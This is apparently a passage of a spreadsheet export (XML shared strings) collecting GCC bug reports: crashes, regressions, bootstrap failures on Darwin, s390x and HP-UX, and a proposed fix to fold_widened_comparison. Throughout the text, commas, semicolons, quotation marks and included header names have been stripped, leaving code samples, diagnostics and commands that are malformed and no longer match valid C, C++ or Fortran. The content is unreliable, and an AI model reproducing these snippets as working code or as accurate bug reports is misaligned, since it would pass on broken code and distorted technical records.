/usr/lib/gcc/i686-pc-linux-gnu/4.3.0/include/g++-v4/tr1_impl/type_traits:302: internal compiler error: Segmentation fault
Please submit a full bug report...</t>
  </si>
  <si>
    <t>GCC-78949</t>
  </si>
  <si>
    <t>incorrect unused variable warning with SSE2</t>
  </si>
  <si>
    <t>The following program:
typedef unsigned char xmmb_t __attribute__((vector_size(16)))
void f()
{
  xmmb_t bla = { }
  xmmb_t x = { }
  bla 
}
yields an unused variable warning although x is obviously used.
$ g++ -v -Wunused -c unused.cc 
gcc version 6.2.0 (GCC)
unused.cc: In function â€˜void f()â€™:
unused.cc:7:10: warning: variable â€˜xâ€™ set but not used [-Wunused-but-set-variable]
   xmmb_t x = { }</t>
  </si>
  <si>
    <t>GCC-82012</t>
  </si>
  <si>
    <t>[8 Regression] libitm build fails for s390x-linux-gnu</t>
  </si>
  <si>
    <t>Created attachment 42063
Preprocessed source
The build of libitm fails for x390x-linux-gnu:
/scratch/jmyers/glibc/many8/build/compilers/s390x-linux-gnu/gcc/./gcc/xg++ -B/scratch/jmyers/glibc/many8/build/compilers/s390x-linux-gnu/gcc/./gcc/ -nostdinc++ -nostdinc++ -I/scratch/jmyers/glibc/many8/build/compilers/s390x-linux-gnu/gcc/s390x-glibc-linux-gnu/libstdc++-v3/include/s390x-glibc-linux-gnu -I/scratch/jmyers/glibc/many8/build/compilers/s390x-linux-gnu/gcc/s390x-glibc-linux-gnu/libstdc++-v3/include -I/scratch/jmyers/glibc/many8/src/gcc/libstdc++-v3/libsupc++ -I/scratch/jmyers/glibc/many8/src/gcc/libstdc++-v3/include/backward -I/scratch/jmyers/glibc/many8/src/gcc/libstdc++-v3/testsuite/util -L/scratch/jmyers/glibc/many8/build/compilers/s390x-linux-gnu/gcc/s390x-glibc-linux-gnu/libstdc++-v3/src -L/scratch/jmyers/glibc/many8/build/compilers/s390x-linux-gnu/gcc/s390x-glibc-linux-gnu/libstdc++-v3/src/.libs -L/scratch/jmyers/glibc/many8/build/compilers/s390x-linux-gnu/gcc/s390x-glibc-linux-gnu/libstdc++-v3/libsupc++/.libs -B/scratch/jmyers/glibc/many8/build/compilers/s390x-linux-gnu/gcc/s390x-glibc-linux-gnu/libstdc++-v3/src/.libs -B/scratch/jmyers/glibc/many8/build/compilers/s390x-linux-gnu/gcc/s390x-glibc-linux-gnu/libstdc++-v3/libsupc++/.libs -B/scratch/jmyers/glibc/many8/install/compilers/s390x-linux-gnu/s390x-glibc-linux-gnu/bin/ -B/scratch/jmyers/glibc/many8/install/compilers/s390x-linux-gnu/s390x-glibc-linux-gnu/lib/ -isystem /scratch/jmyers/glibc/many8/install/compilers/s390x-linux-gnu/s390x-glibc-linux-gnu/include -isystem /scratch/jmyers/glibc/many8/install/compilers/s390x-linux-gnu/s390x-glibc-linux-gnu/sys-include -DHAVE_CONFIG_H -I. -I/scratch/jmyers/glibc/many8/src/gcc/libitm -I/scratch/jmyers/glibc/many8/src/gcc/libitm/config/linux/s390 -I/scratch/jmyers/glibc/many8/src/gcc/libitm/config/linux -I/scratch/jmyers/glibc/many8/src/gcc/libitm/config/s390 -I/scratch/jmyers/glibc/many8/src/gcc/libitm/config/posix -I/scratch/jmyers/glibc/many8/src/gcc/libitm/config/generic -I/scratch/jmyers/glibc/many8/src/gcc/libitm -ftls-model=initial-exec -mzarch -mhtm -Wall -pthread -Werror -std=gnu++0x -funwind-tables -fno-exceptions -fno-rtti -fabi-version=4 -g -O2 -D_GNU_SOURCE -MT beginend.lo -MD -MP -MF .deps/beginend.Tpo -c /scratch/jmyers/glibc/many8/src/gcc/libitm/beginend.cc  -fPIC -DPIC -o .libs/beginend.o
In file included from /scratch/jmyers/glibc/many8/src/gcc/libitm/libitm_i.h:39:
                 from /scratch/jmyers/glibc/many8/src/gcc/libitm/beginend.cc:25:
/scratch/jmyers/glibc/many8/src/gcc/libitm/local_atomic: In static member function 'static uint32_t GTM::gtm_thread::begin_transaction(uint32_t const gtm_jmpbuf*)':
/scratch/jmyers/glibc/many8/src/gcc/libitm/local_atomic:589:7: error: inlining failed in call to always_inline 'std::__atomic_base::__int_type std::__atomic_base::fetch_add(std::__atomic_base::__int_type std::memory_order) noexcept [with _ITp = long unsigned int]': target specific option mismatch
       fetch_add(__int_type __i
       ^~~~~~~~~
/scratch/jmyers/glibc/many8/src/gcc/libitm/beginend.cc:395:36: note: called from here
       tx-&gt;id = global_tid.fetch_add(tid_block_size memory_order_relaxed)
                ~~~~~~~~~~~~~~~~~~~~^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The build was OK at r251332 failed at r251358.  I suspect the bug 81921 changes (r251333) of being the cause but don't know if the problem is in the compiler or in libitm itself.
Preprocessed source attached.</t>
  </si>
  <si>
    <t>GCC-25590</t>
  </si>
  <si>
    <t>[4.1/4.2 regression] FAIL: gcc.dg/tree-ssa/gen-vect-11.c scan-tree-dump-times vectorized 1 loops 1</t>
  </si>
  <si>
    <t>Executing on host: /home/dave/gcc-4.2/objdir/gcc/xgcc -B/home/dave/gcc-4.2/objdi
r/gcc/ /home/dave/gcc-4.2/gcc/gcc/testsuite/gcc.dg/tree-ssa/gen-vect-11.c   -O2
-ftree-vectorize -ftree-vectorizer-verbose=3 -fdump-tree-vect-stats -fno-show-co
lumn  -lm   -o ./gen-vect-11.exe    (timeout = 300)
PASS: gcc.dg/tree-ssa/gen-vect-11.c (test for excess errors)
Setting LD_LIBRARY_PATH to :/home/dave/gcc-4.2/objdir/gcc::/home/dave/gcc-4.2/ob
jdir/gcc:/home/dave/gcc-4.2/objdir/hppa-linux/libstdc++-v3/.libs:/home/dave/gcc-
4.2/objdir/hppa-linux/libmudflap/.libs:/home/dave/gcc-4.2/objdir/hppa-linux/libs
sp/.libs:/home/dave/gcc-4.2/objdir/./gcc:/home/dave/gcc-4.2/objdir/./prev-gcc
PASS: gcc.dg/tree-ssa/gen-vect-11.c execution test
FAIL: gcc.dg/tree-ssa/gen-vect-11.c scan-tree-dump-times vectorized 1 loops 1
Fails on both hppa-unknown-linux-gnu and hppa2.0w-hp-hpux11.11.</t>
  </si>
  <si>
    <t>GCC-45703</t>
  </si>
  <si>
    <t>[4.6 regression] --help -v no longer shows linker help</t>
  </si>
  <si>
    <t>gcc --help -v no longer runs ld --help because collect2 handles --help itself without running ld.</t>
  </si>
  <si>
    <t>GCC-31118</t>
  </si>
  <si>
    <t>Bootstrap failure: darwin.c:1188: error: too many arguments to function 'categorize_decl_for_section</t>
  </si>
  <si>
    <t>With this configure and build:
#!/bin/tcsh
/bin/rm -rf * env CC=/pkgs/gcc-4.2.0-64/bin/gcc ../configure --build=powerpc64-apple-darwin8.8.0 --host=powerpc64-apple-darwin8.8.0 --target=powerpc64-apple-darwin8.8.0 --with-gmp=/pkgs/gmp-4.2.1-64/ --with-mpfr=/pkgs/gmp-4.2.1-64/ --prefix=/pkgs/gcc-4.3.0-64 make -j 2 bootstrap BOOT_LDFLAGS='-Wl-search_paths_first' &gt; make mail-report-with-warnings.log)
bootstrap fails with
/pkgs/gcc-4.2.0-64/bin/gcc -c   -g -fkeep-inline-functions -DIN_GCC   -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -pedantic -Wno-long-long -Wno-variadic-macros -Wno-overlength-strings -Wold-style-definition -Wmissing-format-attribute -fno-common   -DHAVE_CONFIG_H -I. -I. -I../../gcc -I../../gcc/. -I../../gcc/../include -I./../intl -I../../gcc/../libcpp/include -I/pkgs/gmp-4.2.1-64//include -I/pkgs/gmp-4.2.1-64//include -I../../gcc/../libdecnumber -I../libdecnumber    -I. -I. -I../../gcc -I../../gcc/. -I../../gcc/../include -I./../intl -I../../gcc/../libcpp/include -I/pkgs/gmp-4.2.1-64//include -I/pkgs/gmp-4.2.1-64//include -I../../gcc/../libdecnumber -I../libdecnumber ../../gcc/config/darwin.c
../../gcc/config/darwin.c: In function 'machopic_select_section':
../../gcc/config/darwin.c:1188: error: too many arguments to function 'categorize_decl_for_section'
make[3]: *** [darwin.o] Error 1
make[3]: *** Waiting for unfinished jobs....
rm fsf-funding.pod gcov.pod gfdl.pod cpp.pod gpl.pod gcc.pod
make[2]: *** [all-stage1-gcc] Error 2
make[1]: *** [stage1-bubble] Error 2
make: *** [bootstrap] Error 2</t>
  </si>
  <si>
    <t>GCC-25615</t>
  </si>
  <si>
    <t>Internal compiler error in compiling a module which have the same name procedure.</t>
  </si>
  <si>
    <t>In cygwin platform I got the following internal compiler error.
$ gfortran --version
GNU Fortran 95 (GCC) 4.2.0 20051126 (experimental)
Copyright (C) 2005 Free Software Foundation Inc.
GNU Fortran comes with NO WARRANTY to the extent permitted by law.
You may redistribute copies of GNU Fortran
under the terms of the GNU General Public License.
For more information about these matters see the file named COPYING
$ cat ice.f90
module m
  implicit none
contains
  subroutine p(i)
    integer :: i
  end subroutine
  subroutine p(i)
   integer :: i
  end subroutine
end module
$ gfortran -c ice.f90
ice.f90:5: internal compiler error: in build_function_decl at fortran/trans-dec
l.c:1113
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-60065</t>
  </si>
  <si>
    <t>[c++1y] ICE with auto parameter pack</t>
  </si>
  <si>
    <t>The following line of code (compiled with -std=c++1y) triggers an ICE on trunk:
========================================
template void foo(auto... x)
========================================
bug.cc:1:32: internal compiler error: tree check: expected template_type_parm or template_template_parm or bound_template_template_parm have integer_type in convert_generic_types_to_packs at cp/pt.c:21726
 template void foo(auto... x)
                                ^
0xdc4824 tree_check_failed(tree_node const* char const* int char const* ...)
        ../../gcc/gcc/tree.c:9192
0x64ad63 tree_check3
        ../../gcc/gcc/tree.h:2749
0x64ad63 convert_generic_types_to_packs(tree_node* int int)
        ../../gcc/gcc/cp/pt.c:21726
0x6c8f47 cp_parser_parameter_declaration_list
        ../../gcc/gcc/cp/parser.c:18279
0x6c9532 cp_parser_parameter_declaration_clause
        ../../gcc/gcc/cp/parser.c:18179
0x6bfd05 cp_parser_direct_declarator
        ../../gcc/gcc/cp/parser.c:17072
0x6bfd05 cp_parser_declarator
        ../../gcc/gcc/cp/parser.c:16943
0x6ca599 cp_parser_init_declarator
        ../../gcc/gcc/cp/parser.c:16496
0x6cb41a cp_parser_single_declaration
        ../../gcc/gcc/cp/parser.c:23113
0x6cb704 cp_parser_template_declaration_after_export
        ../../gcc/gcc/cp/parser.c:22915
0x6d6af9 cp_parser_declaration
        ../../gcc/gcc/cp/parser.c:10947
0x6d55e8 cp_parser_declaration_seq_opt
        ../../gcc/gcc/cp/parser.c:10869
0x6d6eca cp_parser_translation_unit
        ../../gcc/gcc/cp/parser.c:4014
0x6d6eca c_parse_file()
        ../../gcc/gcc/cp/parser.c:31528
0x7f6973 c_common_parse_file()
        ../../gcc/gcc/c-family/c-opts.c:1060
Please submit a full bug report [etc.]
The code compiles if I remove the 'x' or replace 'int' by 'typename'.
I'm not sure whether the code is valid or not though.</t>
  </si>
  <si>
    <t>GCC-9479</t>
  </si>
  <si>
    <t>ld --version parsing in gcc configury fails on latest FSF binutils-2.13.2.1</t>
  </si>
  <si>
    <t>gcc's configure script attempts to determine the ld version string in one of it's tests but fails to do so when used with the latest FSF release of binutils (2.13.2.1).
The configury works fine when used with version 2.13.2 so it appears the extra digit on the current release is confusing the regexp. The regexp needs to be reworked but I haven't been able to come up with a working version up to this point.
This is a critical problem as it results in gcc not correctly identifying that our binutils has .hidden support which then results in non-functioning __cxa_atexit support in glibc which is obviously bad when gcc is now always configured with --enable__cxa_atexit. Ultimate result is segfaulting c++ binaries.
More info can be found here:-
http://gcc.gnu.org/ml/gcc/2003-01/msg01396.html
Release:
all recent gcc's - 3.2 3.3 &amp; 3.4
Environment:
i686-pc-linux-gnu
How-To-Repeat:
Install FSF binutils-2.13.2.1 then configure gcc to use those binutils and watch as it says:-
checking assembler hidden support... no</t>
  </si>
  <si>
    <t>GCC-8448</t>
  </si>
  <si>
    <t>Regression from gcc 2.96 concerning nested namespaces</t>
  </si>
  <si>
    <t>The attached program shows a problem with nested namespaces.
An output operator is not seen if it is within a nested
namespace.  The attached program compiles fine with gcc
2.96 20000731 (Red Hat Linux 7.2 2.96-108.7.2)
with Comeau C/C++ 4.3.0.1 and with Intel's icc 6.0.1.
It does not compile however with gcc 3.2.
(I apologize for referring to gcc 2.96 a non-release
but I do not have any other version of gcc handy.)
Release:
3.2
Environment:
RedHat 8.0
Linux zoltan.unisuv.it 2.4.19 #31 Mon Oct 28 14:17:54 CET 2002 i686 athlon i386
GNU/Linux
How-To-Repeat:
$g++ -v
Reading specs from /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.2/specs
Configured with: ../gcc-3.2/configure --prefix=/usr/local
Thread model: posix
gcc version 3.2
$ g++ -c -W -Wall gccbug.cc
/usr/local/include/c++/3.2/bits/stream_iterator.h: In member function 
   `std::ostream_iterator&amp; std::ostream_iterator&lt;_Tp 
   _CharT _Traits&gt;::operator=(const _Tp&amp;) [with _Tp = 
   Parma_Polyhedra_Library::Constraint _CharT = char _Traits = 
   std::char_traits]':
/usr/local/include/c++/3.2/bits/stl_algobase.h:228:   instantiated from `_OutputIter std::__copy(_InputIter _InputIter _OutputIter std::input_iterator_tag) [with _InputIter = Parma_Polyhedra_Library::ConSys::const_iterator _OutputIter = std::ostream_iterator &gt;]'
/usr/local/include/c++/3.2/bits/stl_algobase.h:260:   instantiated from `_OutputIter std::__copy_aux2(_InputIter _InputIter _OutputIter __false_type) [with _InputIter = Parma_Polyhedra_Library::ConSys::const_iterator _OutputIter = std::ostream_iterator &gt;]'
/usr/local/include/c++/3.2/bits/stl_algobase.h:303:   instantiated from `_OutputIter std::__copy_ni2(_InputIter _InputIter _OutputIter __false_type) [with _InputIter = Parma_Polyhedra_Library::ConSys::const_iterator _OutputIter = std::ostream_iterator &gt;]'
/usr/local/include/c++/3.2/bits/stl_algobase.h:323:   instantiated from `_OutputIter std::__copy_ni1(_InputIter _InputIter _OutputIter __false_type) [with _InputIter = Parma_Polyhedra_Library::ConSys::const_iterator _OutputIter = std::ostream_iterator &gt;]'
/usr/local/include/c++/3.2/bits/stl_algobase.h:349:   instantiated from `_OutputIter std::copy(_InputIter _InputIter _OutputIter) [with _InputIter = Parma_Polyhedra_Library::ConSys::const_iterator _OutputIter = std::ostream_iterator &gt;]'
gccbug.cc:68:   instantiated from here
/usr/local/include/c++/3.2/bits/stream_iterator.h:141: no match for `
   std::basic_ostream &gt;&amp; &lt;&lt; const 
   Parma_Polyhedra_Library::Constraint&amp;' operator
/usr/local/include/c++/3.2/bits/ostream.tcc:55: candidates are: 
   std::basic_ostream&amp; std::basic_ostream&lt;_CharT 
   _Traits&gt;::operator&lt;&lt;(std::basic_ostream&lt;_CharT 
   _Traits&gt;&amp;(*)(std::basic_ostream&amp;)) [with _CharT = char 
   _Traits = std::char_traits]
/usr/local/include/c++/3.2/bits/ostream.tcc:77:                 
   std::basic_ostream&amp; std::basic_ostream&lt;_CharT 
   _Traits&gt;::operator&lt;&lt;(std::basic_ios&lt;_CharT 
   _Traits&gt;&amp;(*)(std::basic_ios&amp;)) [with _CharT = char _Traits 
   = std::char_traits]
/usr/local/include/c++/3.2/bits/ostream.tcc:99:                 
   std::basic_ostream&amp; std::basic_ostream&lt;_CharT 
   _Traits&gt;::operator&lt;&lt;(std::ios_base&amp;(*)(std::ios_base&amp;)) [with _CharT = char 
   _Traits = std::char_traits]
/usr/local/include/c++/3.2/bits/ostream.tcc:171:                 
   std::basic_ostream&amp; std::basic_ostream&lt;_CharT 
   _Traits&gt;::operator&lt;&lt;(long int) [with _CharT = char _Traits = 
   std::char_traits]
/usr/local/include/c++/3.2/bits/ostream.tcc:208:                 
   std::basic_ostream&amp; std::basic_ostream&lt;_CharT 
   _Traits&gt;::operator&lt;&lt;(long unsigned int) [with _CharT = char _Traits = 
   std::char_traits]
/usr/local/include/c++/3.2/bits/ostream.tcc:146:                 
   std::basic_ostream&amp; std::basic_ostream&lt;_CharT 
   _Traits&gt;::operator&lt;&lt;(bool) [with _CharT = char _Traits = 
   std::char_traits]
/usr/local/include/c++/3.2/ostream:104:                 
   std::basic_ostream&amp; std::basic_ostream&lt;_CharT 
   _Traits&gt;::operator&lt;&lt;(short int) [with _CharT = char _Traits = 
   std::char_traits]
/usr/local/include/c++/3.2/ostream:115:                 
   std::basic_ostream&amp; std::basic_ostream&lt;_CharT 
   _Traits&gt;::operator&lt;&lt;(short unsigned int) [with _CharT = char _Traits = 
   std::char_traits]
/usr/local/include/c++/3.2/ostream:119:                 
   std::basic_ostream&amp; std::basic_ostream&lt;_CharT 
   _Traits&gt;::operator&lt;&lt;(int) [with _CharT = char _Traits = 
   std::char_traits]
/usr/local/include/c++/3.2/ostream:130:                 
   std::basic_ostream&amp; std::basic_ostream&lt;_CharT 
   _Traits&gt;::operator&lt;&lt;(unsigned int) [with _CharT = char _Traits = 
   std::char_traits]
/usr/local/include/c++/3.2/bits/ostream.tcc:234:                 
   std::basic_ostream&amp; std::basic_ostream&lt;_CharT 
   _Traits&gt;::operator&lt;&lt;(long long int) [with _CharT = char _Traits = 
   std::char_traits]
/usr/local/include/c++/3.2/bits/ostream.tcc:272:                 
   std::basic_ostream&amp; std::basic_ostream&lt;_CharT 
   _Traits&gt;::operator&lt;&lt;(long long unsigned int) [with _CharT = char _Traits = 
   std::char_traits]
/usr/local/include/c++/3.2/bits/ostream.tcc:298:                 
   std::basic_ostream&amp; std::basic_ostream&lt;_CharT 
   _Traits&gt;::operator&lt;&lt;(double) [with _CharT = char _Traits = 
   std::char_traits]
/usr/local/include/c++/3.2/ostream:145:                 
   std::basic_ostream&amp; std::basic_ostream&lt;_CharT 
   _Traits&gt;::operator&lt;&lt;(float) [with _CharT = char _Traits = 
   std::char_traits]
/usr/local/include/c++/3.2/bits/ostream.tcc:323:                 
   std::basic_ostream&amp; std::basic_ostream&lt;_CharT 
   _Traits&gt;::operator&lt;&lt;(long double) [with _CharT = char _Traits = 
   std::char_traits]
/usr/local/include/c++/3.2/bits/ostream.tcc:348:                 
   std::basic_ostream&amp; std::basic_ostream&lt;_CharT 
   _Traits&gt;::operator&lt;&lt;(const void*) [with _CharT = char _Traits = 
   std::char_traits]
/usr/local/include/c++/3.2/bits/ostream.tcc:120:                 
   std::basic_ostream&amp; std::basic_ostream&lt;_CharT 
   _Traits&gt;::operator*) [with _CharT = 
   char _Traits = std::char_traits]
/usr/local/include/c++/3.2/ostream:211:                 
   std::basic_ostream&amp; 
   std::operator&amp; char) [with _CharT = 
   char _Traits = std::char_traits]
/usr/local/include/c++/3.2/bits/ostream.tcc:500:                 
   std::basic_ostream&amp; std::operator&lt;&lt;(std::basic_ostream&lt;char 
   _Traits&gt;&amp; char) [with _Traits = std::char_traits]
/usr/local/include/c++/3.2/ostream:222:                 
   std::basic_ostream&amp; std::operator&lt;&lt;(std::basic_ostream&lt;char 
   _Traits&gt;&amp; signed char) [with _Traits = std::char_traits]
/usr/local/include/c++/3.2/ostream:227:                 
   std::basic_ostream&amp; std::operator&lt;&lt;(std::basic_ostream&lt;char 
   _Traits&gt;&amp; unsigned char) [with _Traits = std::char_traits]
/usr/local/include/c++/3.2/bits/ostream.tcc:572:                 
   std::basic_ostream&amp; 
   std::operator&amp; const char*) [with 
   _CharT = char _Traits = std::char_traits]
/usr/local/include/c++/3.2/bits/ostream.tcc:622:                 
   std::basic_ostream&amp; std::operator&lt;&lt;(std::basic_ostream&lt;char 
   _Traits&gt;&amp; const char*) [with _Traits = std::char_traits]
/usr/local/include/c++/3.2/ostream:246:                 
   std::basic_ostream&amp; std::operator&lt;&lt;(std::basic_ostream&lt;char 
   _Traits&gt;&amp; const signed char*) [with _Traits = std::char_traits]
/usr/local/include/c++/3.2/ostream:251:                 
   std::basic_ostream&amp; std::operator&lt;&lt;(std::basic_ostream&lt;char 
   _Traits&gt;&amp; const unsigned char*) [with _Traits = std::char_traits]</t>
  </si>
  <si>
    <t>GCC-3297</t>
  </si>
  <si>
    <t>fixincludes (?) removes pthread types from types.h</t>
  </si>
  <si>
    <t>/usr/local/lib/gcc-lib/sparc-sun-solaris2.5/3.0/include/sys/types.h
does not define pthreads-related types.  Standard solaris headers in
/usr/include (such as /usr/include/time.h) rely on it doing so.  This
results in parse errors when these headers use pthread_attr_t and it
has not been provided by the #include
Release:
3.0
Environment:
System: SunOS curley.intouchsys.com 5.7 Generic_106541-15 sun4m sparc SUNWSPARCstation-5
Architecture: sun4
host: sparc-sun-solaris2.5
build: sparc-sun-solaris2.5
target: sparc-sun-solaris2.5
configured with: ../gcc-3.0/configure
How-To-Repeat:
Here's a copy-and-paste of my demonstration.  Note that hworld2.c is
legal but will only compile if I explicitly force the use of the
headers in /usr/include rather than letting gcc use its fixed headers.
 $ curley $ cat hworld.c
#include 
int main(int argc char **argv)
{
printf(Hello World!\n)
}
 $ curley $ cat hworld2.c
#include 
#include 
int main(int argc char **argv)
{
printf(Hello World!\n)
}
 $ curley $ gcc hworld.c -o hworld
 $ curley $ ./hworld
Hello World!
 $ curley $ gcc hworld2.c -o hworld2
In file included from hworld2.c:1:
/usr/include/time.h:131: parse error before pthread_attr_t
/usr/include/time.h:133: parse error before '}' token
 $ curley $ gcc hworld2.c -I/usr/include/ -o hworld2
 $ curley $ ./hworld2
Hello World!</t>
  </si>
  <si>
    <t>ggould</t>
  </si>
  <si>
    <t>GCC-70357</t>
  </si>
  <si>
    <t>[openacc][gomp4] ICE on reduction (+:sum) private (sum)</t>
  </si>
  <si>
    <t>testcase:
...
int
main (void)
{
  unsigned int sum = 0
  #pragma acc parallel reduction (+:sum) private(sum)
  return 0
}
...
ICE when compiling for openacc with gomp-4_0-branch:
...
$ gcc -O2 -fopenacc private.c
private.c: In function â€˜mainâ€™:
private.c:5:11: internal compiler error: Segmentation fault
   #pragma acc parallel reduction (+:sum) private(sum)
           ^~~
0xf65b5a crash_signal
	src/gcc/toplev.c:335
0xd02bdb lookup_decl
	src/gcc/omp-low.c:1080
0xd15cb6 lower_oacc_reductions
	src/gcc/omp-low.c:5714
0xd4806b lower_omp_target
	src/gcc/omp-low.c:16978
0xd49240 lower_omp_1
	src/gcc/omp-low.c:17301
0xd4976f lower_omp
	src/gcc/omp-low.c:17394
0xd48e49 lower_omp_1
	src/gcc/omp-low.c:17242
0xd4976f lower_omp
	src/gcc/omp-low.c:17394
0xd48e49 lower_omp_1
	src/gcc/omp-low.c:17242
0xd4976f lower_omp
	src/gcc/omp-low.c:17394
0xd4b743 execute_lower_omp
	src/gcc/omp-low.c:18129
0xd4b7e8 execute
	src/gcc/omp-low.c:18166
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
...
On trunk instead we get:
...
private.c: In function â€˜mainâ€™:
private.c:5:34: error: â€˜sumâ€™ appears more than once in data clauses
   #pragma acc parallel reduction (+:sum) private(sum)
...</t>
  </si>
  <si>
    <t>cesar</t>
  </si>
  <si>
    <t>GCC-71381</t>
  </si>
  <si>
    <t>C/C++ OpenACC cache directive rejects valid syntax</t>
  </si>
  <si>
    <t>GCC-23522</t>
  </si>
  <si>
    <t>[3.4/4.0/4.1 Regression] fold_widened_comparison bug</t>
  </si>
  <si>
    <t>I believe there is a bug in fold_widened_comparison() present in all versions
of gcc including 4.1 
The lines 6103 - 6105 of fold-const.c (gcc 4.0.1) looks like:
    arg1_unw = get_unwidened (arg1 shorter_type)
    if (!arg1_unw)
      return NULL_TREE 
Notice that get_unwidened() never returns zero so the if() may
look redundant but actually it has to be arg1_unw == arg1 comparison
that will signify that get_unwidened() failed to adjust arg1
to shorter type.
The diff for fix looks like:
------- fold-const.c -------
*** fold-const.c_old    Mon Aug 22 17:57:51 2005
--- fold-const.c        Mon Aug 22 16:42:59 2005
***************
*** 61016107 ****
      return NULL_TREE
    arg1_unw = get_unwidened (arg1 shorter_type)
!   if (!arg1_unw)
      return NULL_TREE
    /* If possible express the comparison in the shorter mode.  */
--- 61016107 ----
      return NULL_TREE 
    arg1_unw = get_unwidened (arg1 shorter_type)
!   if (arg1_unw == arg1)
      return NULL_TREE
    /* If possible express the comparison in the shorter mode.  */
Unfortunately I don't have a source example that demonstrates this bug
but if you take the source from PR #21331 and run it on platform
with 64-bit longs the function foo():
unsigned long
foo ()
{ unsigned long retval
  retval = bar ()
  if (retval == -1)  return 0
  return 3  }
will contain an expression: (long long unsigned intD.6) D.1112 == -1.
 &lt;eq_expr fef90230
    type &lt;boolean_type fef92880 _Bool public unsigned QI
        size 
        unit size 
        align 8 symtab 0 alias set -1 precision 1 min 
max &gt;
    arg 0 &lt;nop_expr fef84ea0
        type &lt;integer_type fef92700 long unsigned int sizes-gimplified public
unsigned DI
            size 
            unit size 
            align 64 symtab 0 alias set -1 precision 64 min &lt;integer_cst
fef84680 0&gt; max &gt;
        arg 0 
            used ignored SI file simple.c line 8
            size 
            unit size 
            align 32 context  chain &lt;var_decl
ff00f078 D.1109&gt;&gt;&gt;
    arg 1 
constant invariant 18446744073709551615&gt;
    simple.c:9&gt;
and if you try to apply fold() to this expression you'll receive an incorrect
result.
The fold(eq_expr above) will produce zero.
Let's take a look at fold_widened_comparison() to better understand the problem:
static tree
fold_widened_comparison (enum tree_code code tree type tree arg0 tree arg1)
{
  tree arg0_unw = get_unwidened (arg0 NULL_TREE)
  tree arg1_unw
  tree shorter_type outer_type
  tree min max
  bool above below
  if (arg0_unw == arg0)
    return NULL_TREE
  shorter_type = TREE_TYPE (arg0_unw)
  if (TYPE_PRECISION (TREE_TYPE (arg0)) &lt;= TYPE_PRECISION (shorter_type))
    return NULL_TREE
  arg1_unw = get_unwidened (arg1 shorter_type)
  if (arg1_unw == arg1) /* *********** line 6103.  fixed */
    return NULL_TREE
The first call to get_unwidened(arg0 == nop_expr of var_decl) will remove
NOP_EXPR and
will return 32-bit VAR_DECL.
2nd call to get_unwidened(arg1 == 64-bit integer_cst) will return 64-bit integer
cst.
and incorrect check in line 6103 will fail to recognize type mismatch.
Further calls to fold_relational_const() will compare max 32-bit const with our arg1
64-bit constant and incorrectly determine that such eq_expr is always zero.
The fix is trivial. If 2nd get_unwidened() returned the same tree don't do any
further folding.
Alexey.</t>
  </si>
  <si>
    <t>alexey.starovoytov</t>
  </si>
  <si>
    <t>GCC-11458</t>
  </si>
  <si>
    <t>cc1: conversion from UTF-8 to UCS-4BE not supported by iconv</t>
  </si>
  <si>
    <t>The following error occurs in stage 1:
/bin/sh ../../gcc/gcc/mkconfig.sh tconfig.h
/xxx/gnu/gcc-3.3/objdir/gcc/xgcc -B/xxx/gnu/gcc-3.3/objdir/gcc/ -B/opt/gnu64/hpp
a64-hp-hpux11.11/bin/ -B/opt/gnu64/hppa64-hp-hpux11.11/lib/ -isystem /opt/gnu64/
hppa64-hp-hpux11.11/include -isystem /opt/gnu64/hppa64-hp-hpux11.11/sys-include
-O2 -DIN_GCC    -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototype
s -isystem ./include  -I. -I. -I../../gcc/gcc -I../../gcc/gcc/. -I../../gcc/gcc/
config -I../../gcc/gcc/../include -I../intl  -g0 -finhibit-size-directive -fno-i
nline-functions -fno-exceptions -fno-zero-initialized-in-bss -fno-unit-at-a-time
  \
   -c ../../gcc/gcc/crtstuff.c -DCRT_BEGIN \
  -o crtbegin.o
cc1: conversion from UTF-8 to UCS-4BE not supported by iconv
make[2]: *** [crtbegin.o] Error 1
The configure command used was:
../gcc/configure --with-gnu-as --with-as=/opt/gnu64/bin/as --with-ld=/usr/ccs/bi
n/ld --enable-shared --disable-nls --with-local-prefix=/opt/gnu64 --prefix=/opt/
gnu64 --host=hppa64-hp-hpux11.11 &amp;&amp;
I also see:
if [ -d /usr/include ] \
then \
  CC=/xxx/gnu/gcc-3.3/objdir/gcc/xgcc -B/xxx/gnu/gcc-3.3/objdir/gcc/ -B/opt/gnu
64/hppa64-hp-hpux11.11/bin/ -B/opt/gnu64/hppa64-hp-hpux11.11/lib/ -isystem /opt/
gnu64/hppa64-hp-hpux11.11/include -isystem /opt/gnu64/hppa64-hp-hpux11.11/sys-in
clude -DIN_GCC    -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototy
pes -isystem ./include     -I. -I../../gcc/gcc -isystem include -isystem /usr/in
clude \
  export CC \
  /bin/sh ../../gcc/gcc/scan-types.sh ../../gcc/gcc &gt;tmp-deduced.h \
  mv tmp-deduced.h deduced.h \
else \
  echo timestamp &gt; deduced.h \
fi
cc1: conversion from UTF-8 to UCS-4BE not supported by iconv
scan-types: could not invoke /xxx/gnu/gcc-3.3/objdir/gcc/xgcc -B/xxx/gnu/gcc-3.3
/objdir/gcc/ -B/opt/gnu64/hppa64-hp-hpux11.11/bin/ -B/opt/gnu64/hppa64-hp-hpux11
.11/lib/ -isystem /opt/gnu64/hppa64-hp-hpux11.11/include -isystem /opt/gnu64/hpp
a64-hp-hpux11.11/sys-include -DIN_GCC -W -Wall -Wwrite-strings -Wstrict-prototyp
es -Wmissing-prototypes -isystem ./include -I. -I../../gcc/gcc -isystem include
-isystem /usr/include -E -I../../gcc/gcc/ on st-dummy.c
and
/xxx/gnu/gcc-3.3/objdir/gcc/xgcc -B/xxx/gnu/gcc-3.3/objdir/gcc/ -B/opt/gnu64/hpp
a64-hp-hpux11.11/bin/ -B/opt/gnu64/hppa64-hp-hpux11.11/lib/ -isystem /opt/gnu64/
hppa64-hp-hpux11.11/include -isystem /opt/gnu64/hppa64-hp-hpux11.11/sys-include
fixtmp.c -w -U__SIZE_TYPE__ -U__PTRDIFF_TYPE__ -U__WCHAR_TYPE__ -E \
  | sed -e 's/  / /g' -e 's/ *(/ (/g' -e 's/ [ ]*/ /g' -e 's/( )/()/' \
